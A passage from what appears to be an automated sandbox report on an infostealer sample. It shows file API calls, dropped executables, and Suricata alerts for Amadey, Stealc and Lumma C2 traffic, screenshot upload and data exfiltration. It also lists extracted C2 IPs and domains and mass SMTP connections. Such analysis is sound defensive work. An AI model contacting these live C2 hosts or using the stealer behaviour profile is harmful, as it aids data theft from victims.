Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C7D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C7D076
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C7D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C7D3A9
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C89642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C89642
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C8979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C8979D
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C89B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00C89B2B
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C85C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00C85C97
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe | Code function: 20_2_00BEF011 FindFirstFileExW,20_2_00BEF011
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: 21_2_00CEF011 FindFirstFileExW,21_2_00CEF011
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe | File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe | File opened: C:\Users\user\Documents\desktop.ini

                                                Software Vulnerabilities

Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: chrome.exe | Memory has grown: Private usage: 6MB later: 30MB

                                                Networking

Source: Network traffic | Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.11:49752 -> 176.113.115.6:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:49759 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.11:49762 -> 38.180.229.217:80
Source: Network traffic | Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.11:49762 -> 38.180.229.217:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:49791 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 38.180.229.217:80 -> 192.168.2.11:49762
Source: Network traffic | Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.11:49762 -> 38.180.229.217:80
Source: Network traffic | Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 38.180.229.217:80 -> 192.168.2.11:49762
Source: Network traffic | Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.11:49762 -> 38.180.229.217:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:49796 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:49777 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:49802 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:59843 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:59898 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2060385 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (exarthynature .run) : 192.168.2.11:58494 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2060386 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (exarthynature .run in TLS SNI) : 192.168.2.11:59943 -> 104.21.80.1:443
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:59985 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2060386 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (exarthynature .run in TLS SNI) : 192.168.2.11:64532 -> 104.21.80.1:443
Source: Network traffic | Suricata IDS: 2044249 - Severity 1 - ET MALWARE Win32/Stealc Submitting Screenshot to C2 : 192.168.2.11:49762 -> 38.180.229.217:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:64596 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.11:64638 -> 38.180.229.217:80
Source: Network traffic | Suricata IDS: 2060386 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (exarthynature .run in TLS SNI) : 192.168.2.11:64586 -> 104.21.80.1:443
Source: Network traffic | Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.11:64638 -> 38.180.229.217:80
Source: Network traffic | Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 38.180.229.217:80 -> 192.168.2.11:64638
Source: Network traffic | Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.11:64638 -> 38.180.229.217:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:64700 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 38.180.229.217:80 -> 192.168.2.11:64638
                                                Source: Network trafficSuricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.11:64638 -> 38.180.229.217:80
                                                Source: Network trafficSuricata IDS: 2060386 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (exarthynature .run in TLS SNI) : 192.168.2.11:64662 -> 104.21.80.1:443
                                                Source: Network trafficSuricata IDS: 2060386 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (exarthynature .run in TLS SNI) : 192.168.2.11:64756 -> 104.21.80.1:443
                                                Source: Network trafficSuricata IDS: 2060424 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tracnquilforest .life) : 192.168.2.11:59174 -> 1.1.1.1:53
                                                Source: Network trafficSuricata IDS: 2060416 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (quietswtreams .life) : 192.168.2.11:61809 -> 1.1.1.1:53
                                                Source: Network trafficSuricata IDS: 2060422 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (strawpeasaen .fun) : 192.168.2.11:61777 -> 1.1.1.1:53
                                                Source: Network trafficSuricata IDS: 2060420 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (starrynsightsky .icu) : 192.168.2.11:61070 -> 1.1.1.1:53
                                                Source: Network trafficSuricata IDS: 2060414 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (foresctwhispers .top) : 192.168.2.11:52324 -> 1.1.1.1:53
                                                Source: Network trafficSuricata IDS: 2060418 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (seizedsentec .online) : 192.168.2.11:62407 -> 1.1.1.1:53
                                                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:64808 -> 107.189.27.66:80
                                                Source: Network trafficSuricata IDS: 2060386 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (exarthynature .run in TLS SNI) : 192.168.2.11:64821 -> 104.21.80.1:443
                                                Source: Network trafficSuricata IDS: 2060410 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (collapimga .fun) : 192.168.2.11:56056 -> 1.1.1.1:53
                                                Source: Network trafficSuricata IDS: 2060412 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (earthsymphzony .today) : 192.168.2.11:49380 -> 1.1.1.1:53
                                                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:53717 -> 107.189.27.66:80
                                                Source: Network trafficSuricata IDS: 2060386 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (exarthynature .run in TLS SNI) : 192.168.2.11:53747 -> 104.21.80.1:443
                                                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:53925 -> 107.189.27.66:80
                                                Source: Network trafficSuricata IDS: 2060386 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (exarthynature .run in TLS SNI) : 192.168.2.11:53957 -> 104.21.80.1:443
                                                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:50556 -> 107.189.27.66:80
                                                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:50641 -> 107.189.27.66:80
                                                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:50706 -> 107.189.27.66:80
                                                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:50812 -> 107.189.27.66:80
                                                Source: Network trafficSuricata IDS: 2044249 - Severity 1 - ET MALWARE Win32/Stealc Submitting Screenshot to C2 : 192.168.2.11:50822 -> 38.180.229.217:80
                                                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:50911 -> 107.189.27.66:80
                                                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.11:50918 -> 45.93.20.28:80
                                                Source: Network trafficSuricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.11:50918 -> 45.93.20.28:80
                                                Source: Network trafficSuricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 45.93.20.28:80 -> 192.168.2.11:50918
                                                Source: Network trafficSuricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.11:50918 -> 45.93.20.28:80
                                                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:51005 -> 107.189.27.66:80
                                                Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 45.93.20.28:80 -> 192.168.2.11:50918
                                                Source: Network trafficSuricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.11:50918 -> 45.93.20.28:80
                                                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.11:51066 -> 107.189.27.66:80
                                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:64532 -> 104.21.80.1:443
                                                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.11:64586 -> 104.21.80.1:443
                                                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.11:53736 -> 104.21.24.225:443
                                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:53736 -> 104.21.24.225:443
                                                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.11:53928 -> 104.21.48.1:443
                                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:53928 -> 104.21.48.1:443
                                                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.11:50654 -> 104.21.24.225:443
                                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:50532 -> 104.21.48.1:443
                                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:50902 -> 104.21.48.1:443
                                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:50839 -> 104.21.48.1:443
                                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:50783 -> 104.21.24.225:443
                                                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.11:51082 -> 104.21.48.1:443
                                                Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.11:51118 -> 104.21.48.1:443
                                                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.11:50776 -> 104.21.48.1:443
                                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:50776 -> 104.21.48.1:443
                                                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.11:59943 -> 104.21.80.1:443
                                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:59943 -> 104.21.80.1:443
                                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:53889 -> 104.21.24.225:443
                                                Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.11:53747 -> 104.21.80.1:443
                                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:53957 -> 104.21.80.1:443
                                                Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.11:50703 -> 104.21.24.225:443
                                                Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.11:50804 -> 104.21.48.1:443
                                                Source: Malware configuration extractorIPs: 176.113.115.6
                                                Source: Malware configuration extractorIPs: 185.156.73.73
                                                Source: Malware configuration extractorIPs: 45.91.200.135
                                                Source: Malware configuration extractorURLs: towerbingobongoboom.com
                                                Source: Malware configuration extractorURLs: 62.60.226.86
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: LC0cogV.exe.16.dr
                                                Source: unknownNetwork traffic detected: DNS query count 858
                                                Source: unknownNetwork traffic detected: IP country count 26
                                                Source: global trafficTCP traffic: 192.168.2.11:64697 -> 142.132.166.12:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64702 -> 212.35.60.35:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64703 -> 156.241.15.30:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64708 -> 35.167.11.172:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64709 -> 185.230.212.166:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64722 -> 219.64.12.157:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64725 -> 52.101.42.18:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64726 -> 87.252.1.21:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64728 -> 185.97.217.16:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64730 -> 89.46.106.23:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64731 -> 80.252.97.80:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64735 -> 95.111.239.188:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64741 -> 193.137.45.66:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64746 -> 104.21.112.1:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64748 -> 162.159.205.17:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64749 -> 46.242.144.130:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64753 -> 162.255.118.7:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64754 -> 162.22.250.190:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64758 -> 52.28.153.152:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64760 -> 212.72.229.180:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64763 -> 209.202.254.90:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64772 -> 34.160.13.42:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64774 -> 94.169.2.19:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64777 -> 204.74.99.100:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64782 -> 117.50.20.113:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64794 -> 76.76.21.21:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64796 -> 80.48.169.1:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64797 -> 80.91.55.62:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64798 -> 94.20.74.2:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64800 -> 124.153.64.203:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64804 -> 87.238.28.12:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64805 -> 194.181.228.5:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64809 -> 217.19.248.132:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64815 -> 195.130.132.9:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64820 -> 45.60.85.192:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64822 -> 88.99.165.61:587
                                                Source: global trafficTCP traffic: 192.168.2.11:64824 -> 81.198.164.220:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53660 -> 96.102.167.164:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53677 -> 211.29.132.105:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53684 -> 45.60.245.113:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53691 -> 15.197.225.128:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53692 -> 52.101.10.16:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53693 -> 77.95.250.195:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53696 -> 103.246.18.6:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53708 -> 208.91.197.27:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53709 -> 94.143.220.218:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53710 -> 81.169.145.143:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53714 -> 52.101.10.14:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53718 -> 52.218.102.100:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53720 -> 3.125.131.179:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53721 -> 188.114.97.3:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53722 -> 62.101.76.218:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53728 -> 168.0.132.203:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53731 -> 3.33.130.190:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53738 -> 31.186.18.100:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53739 -> 193.70.18.144:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53751 -> 185.53.178.51:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53759 -> 64.136.53.168:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53766 -> 198.185.159.144:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53767 -> 80.158.66.24:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53771 -> 104.26.5.148:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53772 -> 149.5.31.97:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53776 -> 211.100.47.40:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53778 -> 99.83.253.192:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53875 -> 52.101.73.26:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53876 -> 3.130.253.23:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53888 -> 43.252.166.120:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53909 -> 104.37.34.248:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53911 -> 162.243.151.28:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53918 -> 45.60.33.125:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53922 -> 103.168.172.65:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53927 -> 72.163.4.185:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53929 -> 52.101.145.0:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53930 -> 107.150.100.76:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53941 -> 195.130.131.33:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53947 -> 45.40.151.233:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53956 -> 146.75.123.10:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53958 -> 76.223.84.192:587
                                                Source: global trafficTCP traffic: 192.168.2.11:53961 -> 92.205.50.235:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50526 -> 185.138.56.214:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50527 -> 46.30.213.98:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50531 -> 52.101.137.0:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50536 -> 79.141.193.68:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50547 -> 217.74.65.23:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50554 -> 149.28.121.93:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50558 -> 83.166.143.44:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50559 -> 212.77.100.83:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50560 -> 91.226.98.187:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50565 -> 34.205.242.146:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50566 -> 46.30.213.169:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50575 -> 211.113.80.114:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50577 -> 200.58.112.97:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50578 -> 41.222.53.178:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50580 -> 195.182.6.60:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50581 -> 213.186.33.5:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50585 -> 188.114.96.3:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50586 -> 46.105.46.142:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50596 -> 52.98.241.194:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50600 -> 85.13.130.209:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50604 -> 212.11.225.17:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50608 -> 77.68.93.69:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50609 -> 209.240.204.200:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50610 -> 44.214.199.220:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50615 -> 104.26.6.19:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50617 -> 34.111.176.156:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50626 -> 151.101.2.159:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50632 -> 80.88.84.73:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50645 -> 193.7.207.36:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50646 -> 176.57.65.93:587
                                                Source: global trafficTCP traffic: 192.168.2.11:50649 -> 148.163.149.246:587
                                                Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Thu, 06 Mar 2025 07:09:18 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Thu, 06 Mar 2025 06:25:53 GMT ETag: "1d4c00-62fa693f1c20c" Accept-Ranges: bytes Content-Length: 1920000 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program
                                                Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Thu, 06 Mar 2025 07:10:11 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Thu, 06 Mar 2025 00:52:16 GMT ETag: "71338-62fa1ead40d79" Accept-Ranges: bytes Content-Length: 463672 Content-Type: application/x-msdos-program
                                                Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Thu, 06 Mar 2025 07:10:17 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Thu, 06 Mar 2025 02:25:35 GMT ETag: "1d2400-62fa3388ccd41" Accept-Ranges: bytes Content-Length: 1909760 Content-Type: application/x-msdos-program
                                                Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Thu, 06 Mar 2025 07:10:22 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Wed, 05 Mar 2025 21:50:28 GMT ETag: "1a4600-62f9f60a51100" Accept-Ranges: bytes Content-Length: 1721856 Content-Type: application/x-msdos-program
                                                Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Thu, 06 Mar 2025 07:10:24 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Thu, 06 Mar 2025 02:28:07 GMT ETag: "1d2400-62fa341994b91" Accept-Ranges: bytes Content-Length: 1909760 Content-Type: application/x-msdos-program
                                                Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: openresty Date: Thu, 06 Mar 2025 07:10:26 GMT Content-Type: application/x-msdos-program Content-Length: 1106998 Connection: keep-alive Upgrade: h2,h2c Last-Modified: Thu, 05 Dec 2024 18:34:46 GMT ETag: "10e436-6288a2718791b" Accept-Ranges: bytes X-Served-By: dugong.ydns.eu
                                                Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Thu, 06 Mar 2025 07:10:31 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Thu, 06 Mar 2025 06:25:38 GMT ETag: "eaa00-62fa693135966" Accept-Ranges: bytes Content-Length: 961024 Content-Type: application/x-msdos-program
